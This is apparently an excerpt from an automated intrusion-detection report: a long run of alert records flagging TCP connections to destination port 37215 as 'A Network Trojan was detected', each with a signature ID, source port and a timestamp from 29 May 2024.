                SID:2835222
                Source Port:53978
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.415008
                SID:2829579
                Source Port:32938
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.767504
                SID:2829579
                Source Port:32946
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.798221
                SID:2829579
                Source Port:42136
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.763204
                SID:2829579
                Source Port:36602
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.722447
                SID:2835222
                Source Port:47248
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.664179
                SID:2835222
                Source Port:56992
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.804204
                SID:2835222
                Source Port:36766
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.262636
                SID:2829579
                Source Port:43466
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.555951
                SID:2835222
                Source Port:48662
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.266580
                SID:2835222
                Source Port:39384
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.276761
                SID:2835222
                Source Port:51790
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.911136
                SID:2835222
                Source Port:35280
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.166376
                SID:2835222
                Source Port:42946
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.467095
                SID:2829579
                Source Port:55368
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.909233
                SID:2829579
                Source Port:58448
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.212939
                SID:2835222
                Source Port:48704
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.653366
                SID:2829579
                Source Port:48358
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.785113
                SID:2829579
                Source Port:43142
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.981443
                SID:2829579
                Source Port:48638
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.227112
                SID:2829579
                Source Port:46472
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.807631
                SID:2829579
                Source Port:40672
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.171807
                SID:2835222
                Source Port:55116
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.335510
                SID:2829579
                Source Port:41452
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.257315
                SID:2829579
                Source Port:46900
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.984824
                SID:2829579
                Source Port:47956
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.324628
                SID:2835222
                Source Port:36412
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.947787
                SID:2835222
                Source Port:60650
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.895556
                SID:2835222
                Source Port:49400
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.931920
                SID:2829579
                Source Port:45768
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.035357
                SID:2835222
                Source Port:40030
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.509719
                SID:2835222
                Source Port:52120
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.811527
                SID:2829579
                Source Port:34200
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.232013
                SID:2829579
                Source Port:37264
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.164876
                SID:2835222
                Source Port:57094
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.177996
                SID:2835222
                Source Port:52988
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.232037
                SID:2835222
                Source Port:44716
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.502693
                SID:2829579
                Source Port:41862
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.668640
                SID:2835222
                Source Port:33680
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.841040
                SID:2835222
                Source Port:43980
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.655802
                SID:2835222
                Source Port:55880
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:26.001180
                SID:2835222
                Source Port:38132
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.858047
                SID:2829579
                Source Port:55522
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.899239
                SID:2829579
                Source Port:59326
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.504246
                SID:2829579
                Source Port:53056
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.766296
                SID:2835222
                Source Port:36664
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.764233
                SID:2835222
                Source Port:58296
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.989861
                SID:2835222
                Source Port:55830
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.169039
                SID:2829579
                Source Port:44096
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.908717
                SID:2835222
                Source Port:45722
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.796023
                SID:2829579
                Source Port:41624
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.823501
                SID:2835222
                Source Port:44274
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.221786
                SID:2829579
                Source Port:58768
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.136876
                SID:2829579
                Source Port:46706
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.775131
                SID:2835222
                Source Port:54142
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.025145
                SID:2835222
                Source Port:49590
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.730518
                SID:2829579
                Source Port:48892
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.174008
                SID:2829579
                Source Port:58818
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.564803
                SID:2829579
                Source Port:54692
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.731382
                SID:2835222
                Source Port:58916
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.562118
                SID:2829579
                Source Port:44024
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.574577
                SID:2829579
                Source Port:33676
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.868904
                SID:2829579
                Source Port:39028
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.945067
                SID:2835222
                Source Port:34946
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.209613
                SID:2829579
                Source Port:50920
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.420412
                SID:2835222
                Source Port:58926
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.844590
                SID:2829579
                Source Port:58614
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.686302
                SID:2835222
                Source Port:47350
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.795511
                SID:2829579
                Source Port:42954
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.975842
                SID:2829579
                Source Port:60134
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.224055
                SID:2829579
                Source Port:32850
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.993761
                SID:2835222
                Source Port:56564
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.711206
                SID:2829579
                Source Port:51582
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.182644
                SID:2829579
                Source Port:48006
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.845383
                SID:2829579
                Source Port:37666
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.557158
                SID:2829579
                Source Port:37174
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.092697
                SID:2829579
                Source Port:34560
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.784781
                SID:2829579
                Source Port:33324
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.163618
                SID:2829579
                Source Port:36366
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.810363
                SID:2829579
                Source Port:35638
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.862155
                SID:2835222
                Source Port:34262
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.994540
                SID:2835222
                Source Port:43958
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.567151
                SID:2835222
                Source Port:46102
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.276044
                SID:2829579
                Source Port:60024
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.561816
                SID:2835222
                Source Port:37170
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.869401
                SID:2829579
                Source Port:44646
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.222918
                SID:2835222
                Source Port:50512
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.714348
                SID:2835222
                Source Port:49888
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.209803
                SID:2829579
                Source Port:50728
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.674910
                SID:2829579
                Source Port:41058
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.071769
                SID:2829579
                Source Port:46892
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.645016
                SID:2829579
                Source Port:60302
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.717324
                SID:2829579
                Source Port:59152
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.811641
                SID:2835222
                Source Port:47258
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.997847
                SID:2829579
                Source Port:48804
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.227515
                SID:2835222
                Source Port:43460
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.617383
                SID:2829579
                Source Port:33420
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.944767
                SID:2829579
                Source Port:37472
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.440523
                SID:2835222
                Source Port:58732
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.853408
                SID:2835222
                Source Port:47596
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.767566
                SID:2829579
                Source Port:54910
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.418153
                SID:2835222
                Source Port:38544
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.840321
                SID:2835222
                Source Port:42808
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.766848
                SID:2835222
                Source Port:58096
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.216728
                SID:2835222
                Source Port:45652
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.574969
                SID:2835222
                Source Port:51132
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.628490
                SID:2835222
                Source Port:36976
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.660204
                SID:2829579
                Source Port:57680
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.325942
                SID:2835222
                Source Port:41262
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.163744
                SID:2829579
                Source Port:38632
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.269079
                SID:2829579
                Source Port:55392
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.273949
                SID:2835222
                Source Port:43130
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.733435
                SID:2835222
                Source Port:48252
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.799199
                SID:2829579
                Source Port:38288
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.208221
                SID:2829579
                Source Port:53370
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.780744
                SID:2835222
                Source Port:48472
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.971346
                SID:2829579
                Source Port:43584
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.779566
                SID:2835222
                Source Port:38154
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.876115
                SID:2829579
                Source Port:49286
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.968222
                SID:2835222
                Source Port:59054
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.417996
                SID:2829579
                Source Port:51374
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.686862
                SID:2829579
                Source Port:58464
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.520216
                SID:2835222
                Source Port:55252
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.533198
                SID:2829579
                Source Port:51514
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.189692
                SID:2835222
                Source Port:44350
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.625289
                SID:2835222
                Source Port:52362
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.328126
                SID:2829579
                Source Port:59048
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.429316
                SID:2835222
                Source Port:59920
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.631282
                SID:2835222
                Source Port:33976
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.562831
                SID:2835222
                Source Port:41824
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.964620
                SID:2835222
                Source Port:43968
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.074639
                SID:2829579
                Source Port:35776
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.225882
                SID:2829579
                Source Port:47142
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.279436
                SID:2835222
                Source Port:50742
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.582935
                SID:2835222
                Source Port:36720
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.726270
                SID:2829579
                Source Port:42566
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.567887
                SID:2835222
                Source Port:44800
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.944024
                SID:2829579
                Source Port:56632
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.164815
                SID:2835222
                Source Port:57832
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.277670
                SID:2835222
                Source Port:45618
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.887918
                SID:2829579
                Source Port:32956
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.684600
                SID:2829579
                Source Port:46892
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.920827
                SID:2835222
                Source Port:47938
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.282341
                SID:2829579
                Source Port:36744
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.764126
                SID:2829579
                Source Port:37330
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.292315
                SID:2835222
                Source Port:47498
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.667354
                SID:2829579
                Source Port:47860
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.790554
                SID:2835222
                Source Port:42900
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.943265
                SID:2835222
                Source Port:37554
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.364622
                SID:2829579
                Source Port:40140
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.162223
                SID:2835222
                Source Port:38834
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.380113
                SID:2835222
                Source Port:40716
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.240851
                SID:2835222
                Source Port:49972
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.861895
                SID:2835222
                Source Port:57214
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.934189
                SID:2835222
                Source Port:55666
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.833484
                SID:2835222
                Source Port:40596
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.515594
                SID:2829579
                Source Port:41300
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.893686
                SID:2835222
                Source Port:52954
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.864237
                SID:2835222
                Source Port:55166
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.418777
                SID:2835222
                Source Port:48028
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.446669
                SID:2835222
                Source Port:39202
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.629055
                SID:2835222
                Source Port:60484
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.267764
                SID:2829579
                Source Port:57908
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.710949
                SID:2829579
                Source Port:60744
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.783103
                SID:2829579
                Source Port:41520
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.617556
                SID:2835222
                Source Port:59010
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.869582
                SID:2835222
                Source Port:51782
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.734488
                SID:2835222
                Source Port:34088
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.868751
                SID:2835222
                Source Port:40924
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.965687
                SID:2829579
                Source Port:49658
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.605171
                SID:2829579
                Source Port:43148
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.074928
                SID:2835222
                Source Port:39542
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.962182
                SID:2829579
                Source Port:41838
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.279139
                SID:2835222
                Source Port:57676
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.809365
                SID:2829579
                Source Port:37714
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.228539
                SID:2835222
                Source Port:33168
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.811702
                SID:2835222
                Source Port:55092
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.628416
                SID:2829579
                Source Port:57990
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.598205
                SID:2835222
                Source Port:57030
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.868075
                SID:2829579
                Source Port:58084
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.993646
                SID:2835222
                Source Port:44804
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.944722
                SID:2835222
                Source Port:60908
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.025515
                SID:2829579
                Source Port:49830
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.242196
                SID:2829579
                Source Port:50258
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.993698
                SID:2835222
                Source Port:45460
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.981644
                SID:2829579
                Source Port:54862
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.686842
                SID:2835222
                Source Port:37654
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.170308
                SID:2835222
                Source Port:35460
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.683982
                SID:2829579
                Source Port:40610
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.155137
                SID:2829579
                Source Port:38158
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.266111
                SID:2835222
                Source Port:43084
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.655580
                SID:2835222
                Source Port:40144
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.276798
                SID:2835222
                Source Port:48566
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.813400
                SID:2829579
                Source Port:57636
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.675133
                SID:2835222
                Source Port:34138
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.665622
                SID:2835222
                Source Port:36484
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.572752
                SID:2835222
                Source Port:40378
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.288231
                SID:2829579
                Source Port:60536
                Destination Port:37215
